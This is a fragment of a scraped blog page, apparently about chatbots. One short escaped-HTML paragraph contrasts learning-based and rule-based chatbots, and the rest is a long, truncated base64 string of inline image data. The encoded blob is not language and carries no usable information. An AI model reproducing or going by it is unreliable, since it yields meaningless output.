a wider variety of queries, and provide more relevant responses. AI-based chatbots are more adaptive than rule-based chatbots, and so can be deployed in more complex situations. One of the main advantages of learning-based chatbots is their flexibility to answer a variety of user queries. Though the response might not always be correct, learning-based chatbots are capable of answering any type of user query.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='display: block;margin-left:auto;margin-right:auto;' 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sNynAYZweulPJtGUFJ360JWmabSNHtr18FLl89S\/rtHbXr4KXL56l\/XaXKa+8YLcJG3bU7PtkXhbdnNKhCtTmZwvfUDDYaBPL1PNkl+RLAsRu5sduO4Oy9dDSReG9ivLH4RyDtOUZbA5s4GT08p79X6roePvI0mYum6zU9dTUNzs9bQNWFkp5JjEySuqligMbthuVWbBxkKcZwdedwxWOS2O+4bfT1lJE6OIZqcT80nMAgVCDzOWICgDJJAHU6zcQrnbbNT2a53i4U1DRwXMGWoqZVijQGnmA5mYgDqQOvlOlW6cQdhXoW+2Wfe1hrqya72zs6emuUMsj4rYScKrEnABPTza5tossaVeNOF9zu+JsU6rlByY1JUXtkVjtG5pkZ5TNS5HydJtfe2vXwUuXz1L+u0zTyqg7MSossgYRKzAFiB5B5dVzStx1EUtOz2YrG8K089RTq00g8HzK0vZyqg+znA5EHiJjBLc69Lquh4+819JmMHbXr4KXL56l\/Xa8UV0Wrq6m3T0dRRVlIEeWnn5Obs3zyOCjMpUlXAIPerA4IOtnYNy3XdbLLU7vpqaGrSrlgj7Cmlg544yE52SQkgl1c9CVIwVLKQx1qz9\/dd\/uij\/LVOta12ClRoucL70ZKVeU54WTG3\/8Ap\/8AKh+Rj1pV375an+Q035SfW7t\/\/p\/8qH5GPWlXfvlqf5DTflJ9Yq\/1Gn6+ZaHp5f3cR1DU3XcFxutFZqikpIrNUR0c0lTA0zSTNDHMQqq6YUJNF1JJJLDACgtvesO6\/f8AtP4Lk9I1o8PP3Z3z90MX6LoNa28KysrrpR1Vh4m2+wLSQVkM1LUIh8Il7WOMORIRhYykq55TlnXrgENvULFQlSjKUdbS3mGpWmpNJkv6w7r9\/wC0\/guT0jSjufhZZBUV+9r9tTZ97rTToldNJZhFUy0sbKzL2zNIW5QnMqEYJVRle8SFk3Bcqe+UyV\/EmxXO39nUCoCPBHymJFyBhi3OGLFupAUDPKRl2rdksc2zbzPDIskclsqHRkIIYGJiCD5QdZXYaCTujxZVV5t62V9NwM4QyvTsnD2x0600bxCOno0ijeJs80bqoAdDzNlTkEMw7mYGMbh7su87Sod5SbG2olBXxxzUlK+3lq5xFV4ReYiRBzOso51AIHMwy2Mls9lde3inY+4Vz0yVpsD\/ANbWvty37yuHCfZA2bfaW2zJYqEymohEiyA00fKOqnBB65\/m8uRzsnUY1nLOa7ru31mxaJuF2ET6TiJw+2fYJqiw7jtNLb4midoKHadZGuZC6KQvaKvdA38wUjPOnNOW7iZYrvWw2+1b+ttVLNVrQ+Jt2sCpMyoyqzGUAE9og7+8n\/JblwVV34sRVk9sk3tw1gvFNG8RoZJnC9rKiGAuCvOGDFzge6WUDAOGLHbW4iXmekrLRuXaFXaXhIqKukDSsJsA4jABUrnylwQAOjE5HS0Gzv7PxNbP1N5JT+vlnr6GmuktFV09wd4Ump4mhaKYIXVSjM\/MpVJPGDAghRg8xKyGtfcArFTa63FomqhXYnaIEIZPAqjmKg9cZzjPk1sa4tvowo1cMFcrjdoTc4XyE3in\/AhxW\/3Ddv0bq0I\/2tf9kaq\/in\/AhxW\/3Ddv0bq0I\/2tf9ka7GT\/AKtH2\/FmnX9Iz1qAkqAldVv\/ABjLy5+QKAB9rvP851P6S7jU9nc6tObGJT\/UNdOjHE2jQtU83FPxJbwz5f6tHhny\/wBWkqp3tbaeUxR0l8rApIMtBZK2siyDgjtIYmQkEEEZyCOusXs9ofeTdv4q3P0fWbDHeaiqVHrSY9eGfL\/VpG35xPvWzNwWO3Umx7nerfcu1FTVUKPI8BVSwCoqFScKSQ7pkdE528XQu+6FmCizbrGTjLbXuagfbJp8D+fUxT3SCrhSppqhJYpBlXRgQR8h0VNS2EOtKHnIT6zjxdUh\/YXBfiA8skdS0Jnt0SxkxR8yhikjsnOxCLlck56YGpS18ZHuVbDSPw03zRRy1IpjUVNqRY4+h+yNiQtyZwMhT35xgMRKJuS1SIJI7pTOjDKssqkEecEa++yG2++MHzg0zaGfe4V7PxyvlRYorlfuDG+aCsLzJNRw0cVQY+QMykEOOYOoTGB0Z8H3LEZ5ONl5ZJOw4N78V4WhL9vR04Uo0qJJy8kzFmVX5sAYODg4DFWH2Q233xg+cGj2Q233xg+cGmbQz73CnU+qCj8Fu9bQbFv7R7arxSXqOdIY5oY+waUyxjtCrAEICXaMAMWyQOuxJx4qkoamuTg7xEm8GRX7GO1wmWTMTyeIDMFfAVV8Vj48ir3g4a6e6QVcEdVSVMc0MyCSOSNwyupGQQR0II8uioukFJBJU1VSkMMSl5JJHCqijvJJ6AanMsjSkb23NzybgtUN0ks1ytTSgE0twiWOdMgHxlVmA7\/P3gjyak\/DPl\/q0r+yG2++MHzg0eyG2++MHzg1GbQz8tw0eGfL\/VrBV1nLGkw91FIjqenkYZ++Mj+fS+u4La8iQrcYDJK3Ki9qMscE4A8pwCf5jrNNVc6BebvZR3\/6Q1ZUwrQ77mP+jRo1onWK548fvPs33abT\/TtFpir\/AN80\/wDIIPyk2l3jx+8+zfdptP8ATtFpkuKsu5JXIwr0MIU+crJJn73MPv65mVvQL1r5mzZfP9hsbQINlOD\/ANOrvzqXUJuThTZ9yU13pZL5ercLzULVTyW6aOnmWQKi5WUR8\/URoPGZsBQowvTWOs2naqyZp\/CLvSl2LslDeKujjLE5LFIZVXJPUnGSdYPYRavfbdH4z3L9frHTypSjBRaepeHMmVmk22mYDwL2y6ss1\/3HMpOUEtar9m2CoZcpkMARg9\/QE5OSWLZWw7VsWnnp7ZcbtWCoILPcq16qQeMzdGfrjLn\/AIahPYRavfbdH4z3L9fo9hFq99t0fjPcv1+r9a0dz4cyNFnvRO7wIE9gBIy10wB5\/wBizn+oHUXuggUFGScf8r2v8+g16t+2bZbZlqI5LjUyxkmNq+5VNYYyQQSnbyPyEgkZXHQka36ukpq6mlo6yFJoJlKSI4yGU94OudaLVGtXjVitSu4M2adJwg4s+7t2Jbt4T09RWXO6UUlNS1VGrUE4hfs6js+ch+UujjslKujKynqDnBED7SliWphqYdy7jg7G4Vdy7KGqjSJ5ahGVldBHyvGvO5VCCvM5LBjjGR9l2t3ZzddzAsckLua5KP5gJ8DXz2EWr323R+M9y\/X66PWtHc+HM1tFnvRu7e4WWTbl1F1pLrdpitTPVLTzTJ2AeUknxERQQCcqD7k5I6s5bJVsp35XqCMi0URI8oBmqsf1H72o72EWr323R+M9y\/X6krbZ6G0q\/gqzvJIFWSapqZKiZwueUNLKzOwGTgE9MnHfrXtWUKdek6cU9ZkpWeUJYmyY2\/8A9P8A5UPyMetKu\/fLU\/yGm\/KT63dvkEV5Hd4X\/wD1R60q\/puSoJ\/jUNPj5cSTZ\/rH39Ur\/UKfr5kw9PL+7iH2VW0drv28qe5VcFJLVXmKrgSaRUMsHrdRx9ooJ6rzxSLkdMoR5NSVZY+Glwmaor6CwVEju0jNKImJckknr5Tlv6R851mlghmAE0KSAd3MoOPv6x+AUP8AmcHzY1allTNwUHHYrtv8CdmxSbvNe5bZ4XXakrKKut9heOvjniqOUxK0izftoLDr4+Bzefy51l3Jc9v0mzq600l2pmLW+SjpYvChJJK5jKIgySzsTgeUk+fXvwCh\/wAzg+bGvUdLTQtzxU8SN3ZVADq8srXq5Q4\/wVVk8TIRkEefSVs\/dm4rRtPalmtlhtVVT0dgo4a2SpvKU09PWRxhJKdoChIK8mCSwIYgY6Eh21ikpaWVueWmidvOyAnWnZLXoreq+8zVaWdu1irU3Ca519HV3DYO3ZZauTtaiolvEPPSsvMsfPgEsRGQDyE9Sw6jqclm3Hf7VN4HbdibZt1HUVUsk7puGNcfY\/Fk5FiPMzMEUjIwMnJwAWTwCh\/zOD5saPAKH\/M4Pmxrd63\/AAcf4MOieJEPuCe+rt2O5QUdLdVuE889DTViVRhgWGojWQsv8U80fXA6uB36nteIoYYQVhiSMHqQqga9651qtGk1Md1xsUqebjcJvFP+BDit\/uG7fo3Tqt8vaSTQ+wy4vHFIUilSopeWVABhwGlBGevQjOkril\/AfxVPkNhu+PwdjVoR\/ta\/7I13cn\/Vo+34s0a\/pGQxvt6x02VdfpFJ+u0mXOvmkuE8tVSvSTSFXkgdlZomKAlSVJBIPTIONWdqpN21HZ7kr1zjEg\/sjXasMcVRrwOHlieboJ+PMf8AY55tmWJvPbaY\/wDprqc0p2C9Um3+F1rv1esrU9DZYKiURLzOVWFScDIyda1Hxi4eVgIW\/LG6LE8ivE\/2JJG5YmcgEIGyCMkdCCca05bWdSGuKHXVDb2qez2hvKNHKnF6xynBBMs\/X7erg2\/u6wbpmr4rFXCqFtlEFQ6ghVkIyU6+UDv+3qjd+VGNvbyjz\/GvA\/8AVm1tWSOJy9RzcqTwQh\/yR0SiJGixxqFVQAqgYAA8g161j7eDtxS9tH2xTtBHzDm5c4zjvxny6SKbdXEyCkkNw4bxzzpO0MQiu0MbVC46ShGyEXoehcsBjoTkDUOoPejSI28eI\/rXPVRcMqVqqKaoUI1\/iWAxpzcjGURkgkqAy8ni5J6kY0w7cu13uNPWVV8t1Pb0Fa0VF2dSsyzQcqBZOcdMs5bAwCOg695Ar5J1hqrjEuFAudd0Hy1Mh14nqFmq7XCxDBrrQ5H2qiMj\/iBqOqqnkul1TPdc638u+vMFR2l2s6c3fdaP8smuy6f+vi8PkeTVdabh\/F8y8dGk5OLWxPDEt1RePBquQzskEsTc7RxMQZfFBARgAykkZVlPlxr3ScWNgVwU01\/Vi7zJGGp5UMhhQvKUDKCwVRkkZHUdeozxj1h74oqh2NcZHUEwtBMh\/wAl0mRlYfKCAdKiVQeWNebvkQf+Yaz7r4h7W3nsjcEG266SrFNRU9S8pgeNOWSXxMc4BJIQnuxgg566gaOp5qynXm75k\/tDXRsUMUJM4WVKmCvTW\/mXbo0aNc47pXPHj959m+7Taf6dotO12tslcIpqaYRVMBPIWGVYHvRvkOAcjqCB39QUnjx+8+zfdptP9O0WrG1jq0o1oOE1qZaMnB4kQIobxjxqSnz5cVBI\/s61aed6uGKopZrfNFMgkjdKwMHUgEMCB1GCOvyjTRqo97cNLJW19vttLwRs9\/o6CNYqSpqroacQFw4YkcjnCkReP1cAuVGURZNDqqjvfDkZ9Kn4DwRVqpZhRBRnJNUMDHf5NeGnkWqjomlt4qJYnmSI1g52jUgMwGMkAkAnyZ1XHsFqpvCqKfgJaatKiulvRmuN\/DYq5Hn5ivLAxTlWRgnKB4si9xDY3E2hLcK+nortwItfgU9jnpZp5L4ZVhDmZ2o+zMeTGztgMO5JCCq45C6qo73w5DSp+A\/utZF+2CjTqB41UB1Pd5PLrXeuSOqFC9XbVqG5cRGuXnPMHK9MZ6iKUjziNvMdV02y5r+I71uf1OdmjuUHZxUccN+7QRdgeSBmPZII0EZGCiuwAZeXoAwdktW22oFd6nO1rNeZqepvNN6+qY3mDmMkER\/ZeWGaY9VUHATu8ZXVVHe+HIaVPwLOEVcxwI6QnGelT5M4z3efXwJWnmwtGeUZb9lDoPOenyj7+qpqdh3mjqKKrpuDcVYtXaWt81BHuBKejt4jlcqO17Lt5BKpTJ7sopMYJYiAsu1YbJtW4Xu0+pyW7peIqiF6aqr40MNuKoiUqfsVZWjIhj5kZGOB0eUCMF1VR3vhyGlT8C8g85q46ANQmpljeaOEVY52RCquwXGSFLoCfIWHn1nNuvUmFSKlhyertKX5R5woAz98aX+GW2qFI4t0VnDuDa10p6d7VTRR1z1BNCDGVPVUxzFFOGXnGBzYYsof9OqqG9+\/+BpUzWt9DFbqVKWIlgpLM7d7sTlmOPKSSda12ts1W0VVRui1EGVAforo2MqSASO4EH5PlOsdNuvb9ZuGq2pT3ONrtRxdtNSlWVgniZYZGGA7SPOCcc65xkaltbs7PTnSzLXk8thhVSUZY+0WX9eY3Kex6qkx05kmg5T9rmcH74GtH16fwuSg9bJfCYWCSReFUvMjFOcKR2vQ8o5sd+Ovdp01BXbY+1r4tWl1tCVC11RHVThpHAaZEWNZBg+KwRVXIwcKNc55Hpd+X6f2mxpcty48yPNZXjobFU\/Sab5P+1+UffGvKXGrdpESzTsYiA4FVTeKSvMM\/ZenikH7XXWKXgzwvqOyFVsygqRBL28a1AaVRJlW5sOSOjKrDzEZGD11Cbl2pshLrT2ufhRPePBYAKWUU7PDGDTPCFVjlEPZK8feCB0OC8Ykjqan35fp\/aNMl3Vx5jC1dXKvO1kqAoGcmppsY8\/7b8h+9rzDdKiop1q6e0yywPGJVlSrpWQoQCGBEuMYIOflGkerh2pW3KOquXA69CuW0zckssZeQwBJmkhBRmLeNKy8veWqBgd5GSGj2zQNNQUfBK+GnrI5LZNmKQ\/YAZYwCWOAjAtgqT7oE4HKxdTU+\/L9P7Rpku6uPMePC7jgH1hqvG7v2RTdeuP+t8\/TWKK6VM3adlaJn7FuSTFVTHlbGcH7LrDT8MNi3q000F42ehpo4oolt1axlji7GdpVOCTzfZMMCc5AXoO7UiOGuxRXxXMbapBUQwGmQ+NyiM945c8p+2Rn5dOpqffl+n9o0yXdXHmeElu0ih49uVjKe4ienIP\/AKussUF7qQVS0mkPkeplQj7eI2Yn7XT7epWyWO07btkVnsdElJRQs7RwpnlUu5dsZ87Mx\/n1v6tHI9JO9zk\/dyIdrm+xceZXvGahS38BeINMjlyNq3hncjBdjSSkn751YEf7Wv8AsjSRx3\/gP4h\/cpdvzOXTPcbrJbjQU8FGaiaulMMa84QAiNnJJPyIddSEI04qMdiNZtyd7JLVH78qOz3bcUz3SL\/YXVr1tx3HFRzy0u345JkiZo0NWDzMAcDu8+qM33W1b7oq3uFMtNVOsLTwq\/OI5DEpZQ3lAORny662SY4qzXh80eb6T1M1ZIy\/Evgy2rBbJ71wusNBTVktLJJbKFhLFM8TAKsbEcyEN1AI7\/LrHHauKbRMk1626H7uZKSQiQdnEOo\/i4cTdMnpyde8CK2LxP2RQbNstuuF68FqqKhhpZ4poJVZZI1CN\/FwRlTgjIIwQcHU77bPDz4TQfNSfV1ozo1FJ+S\/cdija6DpxeNbF2o9bOpuI1LX1cW9Kmy1NIKSm8HmoI2jZ6nMnblkPcvWLl656NnVGcQajFu3jHn\/AJ67D\/1ZtXj7bPDz4TQn7UUh\/wD46513jcReKHctVQQzSJcJLjNTIYyskiSPI0finBBYMvikAjOCAemt\/J1GblO9PYcTL9spRp0sM0\/LXai4NyQW7cPEKuoNz8Ir9VRRNTUlvvNNMXp6kRRCYSMFZTA0UlVKqSHrzCQqwIwIn2G7HmqBaazhPuHlpq5PBDSPUmGNKL9pcl+zjjHiZCR8yH7GQWboliwcVOGNTEJoOIm2WQ5GfXaDoQcEEc3Qgggg9QRjWT2zeG3xg7a\/C1P9fXKuPS3plOWTY\/DLbV4qr\/beE+8UjhthlANA0CUsUlPIZYgXdWkflllHL15GZlUjOpBtucOrhdKipqeDe9ZakzQVEdQ8M69pK0aplDzhY\/FRA3uRhQD3AatP2zeG3xg7a\/C1P9fXl+KHDOJGkk4ibYREBZma704AA7yTz6E3lNVVxE9xuM4hlgEtfUydlMnLJHmZjysPIwzgjz6y2mp7TcFkTPfdaT8suoS7Xalrr1dK6hmWamqLhVSwyr1WRGmYqynygjBB8oIOvlru9Hbr3abjcKhIKSluNLNPNI3KkUYlXmdiegVRkknoACT3a9TmXomz7PyPmqtcetNurOf+i\/dxWG\/1NzW77fuEEUsdHJB2FQ8nYu\/UoSoyoPNygtykhc48moyktHFdIC9df9vyzCKpKpFRuF7U5MIyT7nuDeXGcY1JJxQ4aSIskfETbLKwBVhd6cgg+UePr17ZvDb4wdtfhan+vryx9KvIDeaX2HgzWHdCUa3n1vi8PNHnsTNzLzcmQDy5zjOq+tVVz3SjXm76iMf+YacuKnETYVy2PcrLat6WSuuFwjWGmpKW4RTTSsZFyVRWLEKPGY4wACT01Wthque+W9fPVRD\/AMw128mU3KjNnkOkFdQtlCF\/9vR07o0aNcQ9eVxx7YR7KtUzA8kW89pu5Azyr6\/UOWPmA7yfIMk6sfUduKxW\/dFiuG3bqjtSXKnkppuRuVwrAjmVv4rDvDd4IBHdpSpr5xV20otd72U27Y4UVIbtZ62mgmqcDq9RTVDQpCx\/7KSRScnCDCgB+1hq6uGiiE05IVpI4hgZ8Z3CL\/xYaTvZ5vP4kt1\/T7R6ZrDW7v3PcqSaguPAfctVTVCGOWGars7xyKe9WU1mCD5joCXo+JOx66SCnptxUrz1LSokAJMnNGoMgKjqCnMvN5iyjvIzs02+No1lQlLSX+lmeRZnUxtzKREEMnjDxQVEiEjOcMDpT9eLh4Wlw\/wc714VGSUn7Wy9opPU4bwvI1r9uQyuPUy3LmQqyn\/kPKlXLgj9l9MOSw+U579ANM3EnaAoY6+guiXGOcTGEUmHMnZQvMwBJC+5jYdSBnp58ZaXiFtGokpqaS9U9NV1U3gq000iiQVAIBhOCVMgLAYBOcHGQCdLDXWuZ3kb1OV5LSo8bsZLJlkeNI3U\/svqGSONCPKqKD0AGvMdxqoZYpovU23ZJIHWWJ1eyBo3VVVWU+F9CFRACO4Io8g0BZMwJhcAZJUgfe0uWvdVvprZR001Be1kigjRx6y1hwwUAjpFqO9nm8\/iS3X9PtHpmj2ebz+JLdf0+0emaAm\/Zjav8yvf4ErP1Wj2Y2r\/ADK9\/gSs\/VahPZ5vP4kt1\/T7R6Zo9nm8\/iS3X9PtHpmgI+22zbFu4hXTiR4Tu2ouFzo0oPB5LLMtPBCpU4UJTLI5JQHMrycuWCcgZgX+319LdKKG40Ts8FQgkjLIyEg+dWAIPyEZ0oezzefxJbr+n2j0zUTtTfO8Y9u0CJwX3TIoi6OtdaQD1PnrAdAWbo0kezzefxJbr+n2j0zR7PN5\/Eluv6faPTNAO+jSR7PN5\/Eluv6faPTNHs83n8SW6\/p9o9M0Ax1P75rf\/Iav8pT6lNVtUb63idxULngtuoMKOqAXw+05ILwdf8cx0wPv63KTiRuevgFTQ8Hdy1MJZlEkVzs7qWVirDIrcZDAg+YgjQD7o0kezzefxJbr+n2j0zR7PN5\/Eluv6faPTNAO+jSR7PN5\/Eluv6faPTNHs83n8SW6\/p9o9M0B448MF4H8Qsnv2tdVHyk0kgAHykkDU9eARdtuA+Ssk\/NZtLM9m3xxEmpod4Wmk25tymrIqx7YtUtXW3HsmWSJKhlAigQSKrMkbS84UKXCllZovn7s7e\/l0v5rNoCa1zNxaqey3\/dUzjDR\/k110zqmeM3C29325eyfbMHhMrxhamnDAOSowGXPf0wMd\/TXWyNWp0rT\/kdyauPM9LLLaLVk+6zxxSjJO5bWta1e8p3w3\/S0eG\/6Wtv2u+IfwRuXzOj2u+IfwRuXzOvW5yz9+PvR8r0XKP3E\/wAkuRqeG\/6Wjw3\/AEtbftd8Q\/gjcvmdHtd8Q\/gjcvmdTnLP34+9DRco\/cT\/ACS5GmapCckKT9oa+eEx\/wCSv3hrd9rviH8Ebl8zo9rviH8Ebl8zqM5Z+\/H3oaLlH7if5JcjS8Jj\/wAlfvDR4TH\/AJK\/eGt32u+IfwRuXzOj2u+IfwRuXzOpzln78fehouUfuJ\/klyNTw3\/S0eG\/6Wtv2u+IfwRuXzOj2u+IfwRuXzOmcs\/fj70NFyj9xP8AJLkL90goqq42qrlRjLT1DchWRlAzG5OQDg9w79etxrSV1hr6eoTKNA5IVihOBkdVIPk7tSdbw94grU0AbaVyBaoYD7F3nspD\/wDg6+Xrh7xBSz1zvtK5BVppSSYu4cp1Rzs9z8uPvRlVnylfH\/BU1fhlv9R5hmip40iiyFRQoycnA85PU\/z6l9r1XPuS1oDnNXEP\/MNa3td8Q\/gjcvmdWBws4QbjS+Um4Nz0vgNNRuJo4HIMkjjuyB7kZ69dYrVaLNSoyeNbOxo2smZPylXtlOLoySvTbcWklfr1tF+6NGjXgz7WGjRo0AaNGjQBo0aNAGjRo0AaNGjQBo0aNAGobZ\/72bd\/9kf1nUzqG2f+9m3f\/ZH9Z0BM6NGjQCRW7ru0u7a7bVFuOzW+SmUSRxVlpqJsx9mjFjOJkjBJZsJ0YhGIBCsRspWbskdY4987RZ2VnVRa5SSq45iB4X3DIz5sjWak25ZbnuC7XW4UCT1VLWdlDI7N9jVqaAsAM4HNgZ6dcDOcDS5cF4V7YvUm2qjbtfTvBRmsV6ekqnpnDF2kjRo8hpAsQZ0AzyGIHIKjQGa9VySUFTVbk4jW+KnrLVX0VNU2CiZKqItD2rzQkyThnSOFnUdmeoHRuinLwd29t\/h3sSg2jbt1vc6eOarqqU1lNDRzxxTVLyiI08ccYjMZmVCvZqQ3TlToggrFeeEBs1vaS2yKKhpqaJI7VUqkXaIY3XlQFI8RFgzg8oAmbm922nSXhrsVaiO5+xulNVS1BroZjzFkqMAGXJPujjJPeSWJyWJIGzHvmxzRrNDT3uSN1DI6WKuZWB7iCIsEfLr17NbP\/md9\/ANd+p1t7Y\/e1af5DB+TXUnoBbl4g7bhqIaOZbvHPU83YxNZK0PJyjLcoMWWwOpx3aBxA24atqAJeDUrGJmh9ZK3tAhJAYr2WcEgjPdkHUbxNtNma3puG97v3BYKShAhlltL4LtKwjiZwI3chJHDY9x5ZAyDAVbvFsWsihvr8Td2W6ipZI5JYqZWpg\/KcBJAIBISDWwBgx5h2aA45ZMgPFfvazyU8lFD6909TUROsDGxV3MG5fdAdl1x36rjgbad37fsdk2xvC71t6uNvutRKap6OsPZU5pGVRNUzwQ9o5clssoYCRVJkKmV8+324c3xK2e08Wd2XKqtASlnqSxEtFJz45XXwdVDNISSjqQeUry8kfIue43\/AIPtuaqsdNxKudBe6ipjqqmkt88gd3L8xLIIyMMuFY4yI0ByvLzaAuHRqueGL7J3KsW5Nkb8v1+oKOFaceE1cslPI7gyiQmRAZH5ZgOjEKAowCp1Y2gDUdfb1DYaOKsnp5pllq6ajCxcuQ88yRITzEdAzrny4z0PdqR0t7\/v1Rt2wLcaTZ9ZuabwymRKCli53z2qnte4hRHjnycdVGDkjQEFBxw2TLbrJeJpailor9SS1VNJOgUjs+yDK2CQMNMFLZ5Qw78EHUuvEewSWqgvkUVYaG41Ip4JWjCZBkVBIQxBC5YHuzgHpnppFslyobia2kvfqcBbKT1soK2aU26OeKoWeOKGWAIsIkeSGDCMhTJEPIBjlzp0PEO6WzwKjtfqZrrS09ZL200kFIsUNNIlFTypJIvYiQ4OIAVQsDTYAOEUgWFbOKezrzDHUW6ullilZFR+xIDBubxxn3SDkbLjK5UjJIIENJx52LDR0lXM1biohSebkgJWmRqvwUlycdFlDjxckhCQDkZgrRQRWqC118fBWxxQ1MdDPNDSWgwyR1nbzlG5PBiQYgMqz8nK05LcgbIlJ0hoqmhuA4L2Yz1dNHd5WipXaWCohRggLLSnMyRKiICVfmbkXoC2gGODijtGoZkSqqFMc0tO\/aQNGqSxSpFIjM2FBV5UB64PMME6h4+Jdjevu1HW7pqYZ7XWTw1EdNTpIlPGsvIpY8jEZLKME5ye7HXS9Q3Spr9u0CDgBTUNLGKaWG31NuHNQNyRyBREsXKSjxAcyleUrFgErqP2nu5pK3clBBwlt0F7lpLhfJe0VuerqVmJjpyRT5kfxUzk84KjCkAHQDo+\/wCip622UNZdrvDNdjWrTx+DwtIWp6lICCoj6ZZ169wyPt68VXFHaFDQJdK3e1xgpJY4pY5nokCukmcEfYs9OSQnzCNyegzqNo7hNb7ztbax4FxPbvDaxKKvoaSNaWywxsWhkZHjQws+OnIMdAc5YLqOob\/FD4X\/APKS33bkjRrwlBZXp5qapSGCHwQxOjdvIIqgFHLIpgzy5VSSBP0PEjbletPW+u1xq6qkkgZqHsY+aJ54m5eflQEYRmJ\/m1ml4tbH3PYL7Barm5kprTWVcqzRNEVijBRmPNgAZIwT0YHIJAOFqpvfgNqtF0v\/AABjF1rqbwi6haWFWpKmkcRRKJEDozlZZTBiUnHMoYFuqrU1qbK2rcrTY\/UyTihME9gxBG80opJp6rwiR5J4gXpCwSXl5iT4Rkr0YgC4IuK+06ikhuVM9ZLQzRtKtUsB7MhURjjPVjiRcYBycjX2l4qbVnr\/AFpmmlgrhUtTPAyZMREzRKZGHRAxAwWIBLBQSxxpQ9dLzcrFUkcEKGirKCKlSngkpzLG9LVTtFVRITTKQwjp1LKFIw0RboBqf23t\/bV0vctNc+EFltktgWnWhq\/W9HVeSR2QQu0KABGzIvZluXn68j5XQFg6NGjQBo0aNAGjRo0AaNGjQBo0aNAGjRo0Aare+8YJDda+xbB22u4am2M0FXWT1wo7dFUq2Hpu3CSu8qYPOEiZUOVZg4KiyNc\/8L2EvDnbVWUVZKy101ZMVAHPNNGJJHOO9md2YnvJYk9+stKCm9ZeEcT1k9LxP4yyRPGOGGz0LKV5l3rVZXPlH\/JffqO23vjjNt6y0tnbh9tWvNMpU1FRvSoDvkk9QtqAGM46Dyfz6m9GtjMQMubia\/tpcZfis2b+OlV\/7Zo9tLjL8Vmzfx0qv\/bNVBfeKvGKw7w3VbY+FD3Wy26VPWSqihqYxVx9nRCTtZI0mbxHqZmBjhYusLqqFo2LatDxw4vT7uo7XU+p9uyWiuutNbGqVnlD0ETSTLLVTM0IR15VhYLGWQKTzTc5ES1zdMrgiWlY97ccbTW3Wrqtk7Vr1uVUKiOOXd0yCnHIq8oKWoFuigZPkA8uSZc8UeMh7+FmzPx0qv8A2vVLw8ZeMVPdzZH4J1l4MlVdY0uUK1FvookhwaVT2sUkjiRWCtLyoOcNyJIo5jtV3GjivSV8NBF6nq6zl2u8Mk63JuxSSjgDwkMKckxVMhMcbkA4AblJygZumMES3fbQ4x\/FXsz8dKr\/ANr1hr+JXGurop6Wn4c7QpJZY2RJ495VDNGSOjANaypx5iMa2aNqt6SF6+CKGpaNTNHDKZY0kx4yq5VSwByASqkjrgd2s2rZiBObiam0OKW4dp2q02niftyCjplMdE15oLmK2ngOMI9SGp6dokLYTmVHC5UuQvM4uPVPXK20F4t1VaLrSRVdFXQvT1MEqhklidSrIwPeCCQR8unfhTXVV04XbPuVbK0tRV2G3zzSMcl3anQsT8pJOsFamoXXGOcVHYNDoki8rqGHmIyNY\/A6TkWPwWHkQ5VeQYBxjoPtdNZtV9DvfeW8KoScPrNa4LCskkZvl4kkPhJQ45qWkjAMsRIYCV5YgcBkWRGVjhKDtPabVU0k1vqLbSy0tShjmheFTHIh71ZSMEdT0Osi0FCjmRaOAMTzFhGMk+fOlPseK\/wn2j+Aqn0vR2PFf4T7R\/AVT6XoBvigggBEEMcYPeEUDP3tZNJnY8V\/hPtH8BVPpejseK\/wn2j+Aqn0vQDnqI3PBuSqtT0+1q2npK2TmUTzDPZjkblZQVYE8\/J0Ixjm8uNQfY8V\/hPtH8BVPpejseK\/wn2j+Aqn0vQGsLBxWFoqKeTe1JLcWo2jhqBTJHGtSJFKS8gjJA5FPMCzDLEYIwdRNLtTjNbJ7hUpv5J4qi7eEU0EkUdT2VK6MpV+aNCeVzG\/IjIOVXC4JGp\/seK\/wn2j+Aqn0vR2PFf4T7R\/AVT6XoCOvFh4t17QV+395Jbc2YQyUtVBCxauJiPaviOQKVUTDCHl5mGQ4Ax9vm1uKlZfFqrPvoUNAHXljHZlkQygyeK0LB37PIGTyjuCqT2gkOx4r\/CfaP4CqfS9HY8V\/hPtH8BVPpegNmjs++oIazwrc8dTNJBVCmdo41EUrhOxyFjAKoRJ35OCM82l+1WPiBJJV1lp3TTxIt0rcxSU0WWQ1UgKl+zJwIypXGMOpzzK2Fl+x4r\/AAn2j+Aqn0vURtqLin4LWdnuXaYHrjV55rJUnr2zZ\/6X3aAkBYeKIpHC7upVqnpypfs1ZRN25YMA0ZAXsiVxjvx5tNlmp7lS0Ahu9f4ZUiWUmblVSyGRjGCFVRkIVHd5PL36Wux4r\/CfaP4CqfS9HY8V\/hPtH8BVPpegHJlVxh1DAEHqM9R3ajdzfvbuv8in\/JnS\/wBjxX+E+0fwFU+l6jtxw8VPY\/c+03NtIr4HNzBbHUgkch7v2XoCxNGkzseK\/wAJ9o\/gKp9L0djxX+E+0fwHU+l6Ac9Gkiwb2v8AT3+n2jxBs9BbrhcDL61VtBVtNR3ERrzMgDqrw1AQM5hIccisVkflfld9AGjRo0AaNGjQBo0ahTdLxW3KuobTSUixW90hkmqJGy8rIshVVUdwV06k9SSMdMkCa0aXq673a18nrnctvUnaZ5O3naPmx345iM94+\/rWtu56+6mKOlum3TUTDIphVc8o6ZIwjEHAHkJ0A1aNQFwut\/stOLhcaa3y0iSRrP2Mjq6IzBS4BBDYyDjp0B8vTU\/oA1z5wsdI+Fu0ZJGCqthoCzE4AHg6dTroPXNHBPblj37T7VsG6aFLja7Dsy03EW+oUPS1NRUK0aPNGRiTsxTtyq2VDSc2OZUK5qUsF7LweG9kg3GHhIjFH4pbQVlOCDfKYEH+nr57cfCL41Nn\/hyl+vq\/ktdsiRY47dSoiAKqrCoAA7gBjXr1ut\/+Y0\/zS\/3avpD3Fs74HP8A7cfCL41Nn\/hyl+vqWsG9dm7rkli2tu2y3h4AGlW318VQYwe4sEY4H29XV63W\/wDzGn+aX+7S5vnhttvfFoko6mip6S4xIzW26w06eFW2ox4s0LEZBBAJHuWGVYFSQWkPcM74CfNNDTQvUVEqRRRKXd3YKqqBkkk9AAPLpSPGPhEDg8VNoZ\/35S\/X164TUls4t7jS5b1tNNcKe1bZs1yp6CcdpSisru3eWVom8R2QU8QjZgSmZOXHMdX6LdbwMCgpwB\/2S\/3atOvhdyRLqXPUUB7cfCL41Nn\/AIcpfr6Pbj4RfGps\/wDDlL9fXQHrdb\/8xp\/ml\/u0et1v\/wAxp\/ml\/u1XSHuIzrKltl1td7oIbpZrlS19FUAtFU0syyxSDOMq6kg9QR0OnHgz\/BBsb7m7Z+bR6S+Km3bJtDdW1t27dtVPQ